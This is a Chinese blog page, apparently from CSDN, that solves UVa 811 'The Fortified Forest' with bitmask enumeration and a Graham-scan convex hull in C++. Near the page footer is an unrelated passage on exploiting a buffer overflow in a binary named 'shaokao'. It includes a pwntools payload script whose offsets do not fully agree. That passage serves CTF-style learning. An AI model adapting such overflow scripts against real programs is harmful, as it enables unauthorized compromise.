UVa 811 - The Fortified Forest

题目:在二维平面上有n棵树,每棵树有自己的高度和价值。从里面砍掉一些,做成围栏(围栏的长度都与被砍掉树的高度和),问砍掉的最小价值是多少,如果价值相同,取砍掉树数目最少的。

分析:状态压缩、计算几何、凸包。如果搜索显然后超时(15!),利用2进制状态表示树砍和不砍的状态,例如:5(10)=101(2)表示1、3被砍掉,则一共有1<<15种状态,然后计算每种状态下未被砍掉的树的凸包以及被砍掉树的高和,比较即可。

注意:线段的周长等于二倍的线段长。

#include <algorithm>
#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <cmath>

using namespace std;

//点结构 
typedef struct pnode
{
	int x,y,v,l,d;
}point;
point I[16];
point P[16];

//叉乘ab*ac 
int crossproduct( point a, point b, point c )
{
	return (b.x-a.x)*(c.y-a.y)-(c.x-a.x)*(b.y-a.y);
}

//点到点距离 
int dist( point a, point b )
{
	return (a.x-b.x)*(a.x-b.x)+(a.y-b.y)*(a.y-b.y);
}

//坐标排序 
bool cmp1( point a, point b )
{
	return (a.x==b.x)?(a.y<b.y):(a.x<b.x);
}

//级角排序 
bool cmp2( point a, point b )
{
	double cp = crossproduct( P[0], a, b );
	if ( !cp ) return a.d < b.d;
	else return cp > 0;
}

//计算凸包 
double Graham( int n )
{
	sort( P+0, P+n, cmp1 );
	for ( int i = 1 ; i < n ; ++ i )
		P[i].d = dist( P[0], P[i] );
	sort( P+1, P+n, cmp2 );
	
	int top = n-1;
	if ( n > 2 ) {
		top = 1;
		for ( int i = 2 ; i < n ; ++ i ) {
			while ( top > 0 && crossproduct( P[top-1], P[top], P[i] ) <= 0 ) -- top;
			P[++ top] = P[i];
		}
	}
	P[++ top] = P[0];
	
	double L = 0.0;
	for ( int i = 0 ; i < top ; ++ i )
		L += sqrt(dist( P[i], P[i+1] )+0.0);
	return L;
}

int main()
{
	int n,t = 0;
	while ( scanf("%d",&n) && n ) {
		for ( int i = 0 ; i < n ; ++ i )
			scanf("%d%d%d%d",&I[i].x,&I[i].y,&I[i].v,&I[i].l);
		
		double MinV = 0x7ffffff,MinL = 0.0;
		int E = (1<<n)-1,S = 0,C = n;
		for ( int i = 0 ; i < E ; ++ i ) {
			int count = 0,cut = 0;
			int SumL = 0,SumV = 0;
			for ( int j = 0 ; j < n ; ++ j )
				if ( i&(1<<j) ) {
					SumL += I[j].l;
					SumV += I[j].v;
					cut ++;
				}else P[count ++] = I[j];
			
			double V = Graham( count ); 
			if ( V<=SumL && (SumV<MinV || (SumV==MinV&&cut<C)) ) {
				MinV = SumV;
				MinL = SumL-V;
				C = cut;
				S = i;
			}
		}
		
		if ( t ++ ) printf("\n");
		printf("Forest %d\nCut these trees:",t);
		for ( int i = 0 ; i < n ; ++ i )
			if ( S&(1<<i) ) printf(" %d",i+1);
		printf("\nExtra wood: %.2lf\n",MinL);
		
	}
	return 0;
}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于这段代码,我们可以看到存在一个缓冲区溢出漏洞,即在gaiming函数中使用scanf函数读取输入到v5数组时,没有对输入进行长度限制,导致可能会覆盖到name变量的值。 攻击的基本思路是通过输入超长的字符串来覆盖掉name变量的值,从而控制程序的行为。具体的攻击流程如下: 1. 首先需要确定name变量在栈中的偏移量,可以通过调试程序或者静态分析代码来确定。假设name变量在栈中的偏移量为0x100。 2. 构造一个超长的输入字符串,长度应该大于0x100,其中前面部分可以填充任意字符,后面部分需要填充希望覆盖到name变量的值。假设我们想要将name变量的值修改为0xdeadbeef,那么可以构造一个输入字符串如下: `"A"*0x108 + "\xef\xbe\xad\xde"` 其中"\xef\xbe\xad\xde"是0xdeadbeef的16进制表示。 3. 将构造好的字符串输入到程序中,就可以触发缓冲区溢出漏洞,修改name变量的值。 下面是可能需要的攻击代码: ``` from pwn import * # 定义目标程序的相关信息 binary = ELF('./shaokao') context.binary = binary # 定义本地或远程连接 p = process(binary.path) # p = remote('ip', port) # 构造攻击字符串 payload = b"A" * 0x108 + p64(0xdeadbeef) # 发送攻击字符串 p.sendlineafter(b'name:', payload) # 进入交互模式 p.interactive() ``` 需要注意的是,攻击的成功与否还取决于目标程序的保护机制,例如是否开启了ASLR、栈随机化等。如果目标程序开启了ASLR,则需要先泄漏出程序的基址,才能计算出name变量在栈中的准确偏移量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值